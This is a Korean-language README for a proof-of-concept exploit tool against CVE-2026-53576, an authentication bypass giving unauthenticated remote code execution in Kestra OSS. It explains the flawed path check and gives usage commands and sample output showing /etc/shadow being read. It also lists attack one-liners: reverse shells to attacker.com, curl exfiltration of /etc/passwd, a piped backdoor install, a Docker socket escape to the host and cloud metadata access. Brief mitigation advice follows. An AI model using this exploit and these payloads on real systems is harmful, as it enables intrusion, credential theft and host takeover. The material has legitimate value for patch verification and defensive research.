
Kestra 인증되지 않은 RCE 익스플로잇 (CVE-2026-53576)
이 도구는 교육 및 허가된 보안 테스트 목적으로만 사용됩니다.
- 절대 소유하지 않았거나 명시적 서면 허가 없이 테스트할 수 없는 시스템에 사용하지 마십시오.
- 절대 불법 활동에 사용하지 마십시오.
- 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.
- 사용에 따른 책임은 전적으로 본인에게 있습니다.
CVE-2026-53576은 v1.3.20 이하 Kestra OSS 버전에 존재하는 치명적인 취약점으로, 인증 필터 우회를 통해 비인증 원격 코드 실행을 허용합니다.
| 속성 | 값 |
|---|---|
| CVE ID | CVE-2026-53576 |
| 심각도 | 치명적 (CVSS 9.8) |
| 취약점 유형 | 인증 우회 + RCE |
| 영향을 받는 제품 | Kestra OSS |
| 영향을 받는 버전 | ≤ v1.3.20 |
| 공격 벡터 | 네트워크 |
| 필요한 인증 | 없음 |
| 사용자 상호작용 | 없음 |
Kestra의 인증 필터에는 치명적인 로직 결함이 있습니다:
// Vulnerable code in AuthenticationFilter.java:53
boolean isConfigEndpoint = request.getPath().endsWith("/configs")
이 코드는 정확한 라우트를 매칭하는 대신 어떤 API 요청이 /configs로 끝나는지만 확인합니다. 따라서 공격자는 임의의 엔드포인트에 /configs를 덧붙여 인증을 우회할 수 있습니다.
POST /api/v1/main/flows/configs (인증 우회)POST /api/v1/main/executions/configs/configs (인증 우회)# Any path ending in /configs bypasses authentication
/api/v1/main/flows/configs # Create flows
/api/v1/main/executions/configs/configs # Execute flows
/api/v1/{tenant}/flows/configs # Any tenant
/api/v1/{tenant}/executions/configs/configs # Any tenant
python3 kestra_exploit.py <target_ip>
# Custom port
python3 kestra_exploit.py 192.168.1.100 -p 8080
# HTTPS
python3 kestra_exploit.py 192.168.1.100 --https
# Custom command
python3 kestra_exploit.py 192.168.1.100 -c "whoami && hostname"
# Check Docker socket access
python3 kestra_exploit.py 192.168.1.100 --docker-check
# Clean up after exploitation
python3 kestra_exploit.py 192.168.1.100 --cleanup
# Full attack with all options
python3 kestra_exploit.py 192.168.1.100 -p 8080 --docker-check --cleanup -c "id > /tmp/proof.txt"
| 옵션 | 설명 |
|---|---|
target | 대상 IP 주소 또는 호스트 이름 (필수) |
-p, --port | 포트 (기본값: 8080) |
--https | HTTP 대신 HTTPS 사용 |
-c, --command | 실행할 사용자 지정 명령 |
--docker-check | Docker 소켓 액세스 확인 |
--cleanup | 악용 후 플로우 삭제 |
--delay | 요청 간 지연 시간 (기본값: 2초) |
pip install requests
git clone https://github.com/yourusername/CVE-2026-53576
cd CVE-2026-53576
python3 kestra_exploit.py --help
python3 kestra_exploit.py 192.168.1.100
출력:
============================================================
Kestra Unauthenticated RCE Exploit
Security Research Tool - Authorized Use Only!
============================================================
[*] Target: 192.168.1.100:8080
[*] Protocol: http
============================================================
[Step 1] Creating malicious flow...
[*] Creating malicious flow at http://192.168.1.100:8080/api/v1/main/flows/configs
[*] Command: id > /tmp/proof.txt; cat /etc/shadow | head -1 >> /tmp/proof.txt
[+] Flow created successfully! (Status: 200)
[+] Flow revision: 26
[Step 2] Triggering execution...
[*] Triggering execution at http://192.168.1.100:8080/api/v1/main/executions/configs/configs
[+] Execution triggered successfully!
[+] Execution ID: 4nxNTHPk2WInfrnxQa6KF2
[+] Status: CREATED
[Step 3] Checking execution status...
[+] Execution status: SUCCESS
[*] Final status: SUCCESS
[+] Exploitation complete!
[*] To verify the attack succeeded, check the target system for:
- /tmp/proof.txt containing command output
- Kestra UI execution logs
- Web UI: http://192.168.1.100:8080/ui/
python3 kestra_exploit.py 192.168.1.100 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
python3 kestra_exploit.py 192.168.1.100 -c "curl -X POST http://attacker.com/exfil -d @/etc/passwd"
python3 kestra_exploit.py 192.168.1.100 --docker-check --cleanup
| 범주 | 심각도 | 설명 |
|---|---|---|
| 기밀성 | ⚠️ 치명적 | 모든 파일 읽기 (비밀번호, 비밀 값, 구성) |
| 무결성 | ⚠️ 치명적 | 플로우 및 데이터 생성/수정/삭제 |
| 가용성 | ⚠️ 높음 | 시스템 종료, 리소스 고갈 |
| 인증 | ⚠️ 치명적 | Basic-Auth 완전 우회 |
| 권한 상승 | ⚠️ 치명적 | 루트(uid=0) 권한으로 명령 실행 |
| 컨테이너 이스케이프 | ⚠️ 치명적 | Docker 소켓을 통한 호스트 장악 |
비인증 공격자는 다음을 수행할 수 있습니다:
루트 권한으로 임의 명령 실행:
# Read secrets
cat /app/conf/application.yml
# Reverse shell
bash -i >& /dev/tcp/attacker.com/4444 0>&1
# Install malware
curl http://attacker.com/backdoor.sh | bash
호스트 시스템으로 피벗 (Docker 소켓이 마운트된 경우):
docker run -v /:/host --privileged alpine chroot /host
클라우드 메타데이터 접근 (클라우드 제공업체 사용 시):
curl http://169.254.169.254/latest/meta-data/
취약한 인스턴스 종료:
sudo systemctl stop kestra
공개 액세스 차단:
iptables -A INPUT -p tcp --dport 8080 -j DROP
방화벽 규칙 적용:
Kestra를 최신 패치 버전으로 업데이트:
적절한 인증 구현:
컨테이너 강화:
/var/run/docker.sock 마운트 금지네트워크 강화:
| 날짜 | 이벤트 |
|---|---|
| 2026-05-26 | 취약점 발견 |
| 2026-06-03 | Kestra 보안 권고 게시 |
| 2026-06-10 | CVE-2026-53576 지정 |
| 2026-06-15 | 공개 공개 |
| 2026-08-01 | PoC 공개 |
MIT License
Copyright (c) 2026 Security Researcher
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.